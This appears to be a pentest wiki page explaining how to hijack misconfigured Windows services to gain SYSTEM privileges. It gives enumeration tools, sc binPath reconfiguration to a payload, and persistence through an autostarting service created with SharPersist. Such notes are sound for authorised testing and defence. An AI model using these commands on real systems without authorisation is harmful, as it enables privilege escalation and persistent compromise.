Service Hijacking

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
    1. Weak service permissions
    2. Weak binary permissions
  4. Persistance
  5. Recommendations

Vulnerability

Windows services are very often run as NT AUTHORITY/SYSTEM. In case they are not properly configured with strict permissions, they can be abused to hijack to configured binary that is run by the service to escalate your privileges locally.

Prerequisites

  • Low privileges access to the targeted system.
  • At least one of the following:
    • Service run as NT AUTHORITY/SYSTEM has weak permissions such as ChangeConfig, Start and Stop.
    • Service’s binary run as NT AUTHORITY/SYSTEM has weak permissions such as Modify or Full Control.

Exploit

Weak service permissions

First, identify potentially vulnerable services manually, or by using tools such as SharpUp or WinPEAS.

.\SharpUp.exe audit ModifiableServices
.\WinPEAS.exe

Look for weak permissions ChangeConfig for an IdentifyReference you own (Authenticated Users for instance). To do so, you can use Get-ServiceAcl PowerShell script.

Import-Module .\Get-ServiceAcl.ps1
Get-ServiceAcl -Name $ServiceName | Select -Expand Access

Check binary path then reconfigure it, and restart it.

sc qc $ServiceName
sc config $ServiceName binPath= $PayloadPath

If you have permissions to Start and Stop the service, do it. Otherwise, wait for - or force - a reboot.

sc stop $ServiceName
sc start $ServiceName

To restore the previous executable path, don’t forget to quote it like binPath= \""C:\Program Files\My Service\Binary.exe"\" so you don’t introduce an unquoted service path vulnerability.

Weak binary permissions

Sometimes, the binary itself run by the service can be vulnerable to hijacking. You can automatically find them by using tools such as SharpUp or WinPEAS.

.\SharpUp.exe audit ModifiableServiceBinaries
.\WinPEAS.exe

To check permissions on a binary, enter one of the following commands.

# Native PowerShell.
Get-Acl -Path $ExecutablePath | Format-List

# With cmd.
icacls "$ExecutablePath"

If you a user you own can change (either Modify or Full Control rights) the binary, bingo! You can therefore change it with your prefered payload. The, if you have permissions to Start and Stop the service, do it. Otherwise, wait for - or force - a reboot.

Persistance

To persist on a machine with high privileges, it is recommended to create your own service instead of modifying an existing one.

.\SharPersist.exe -t service -c $ExecutablePath -n $ServiceName -m add

# New service is stopped by default, start iit manually and ensure it will automatically start at each reboot.
Set-Service -Name $ServiceName -StartupType Automatic
Set-Service -Name $ServiceName -Status Running -PassThru

Recommendations

  • Enforce strong permissions on services, especially the ones running as NT AUTHORITY\SYSTEM, that avoid any unprivileged user to modify services configuration or binaries.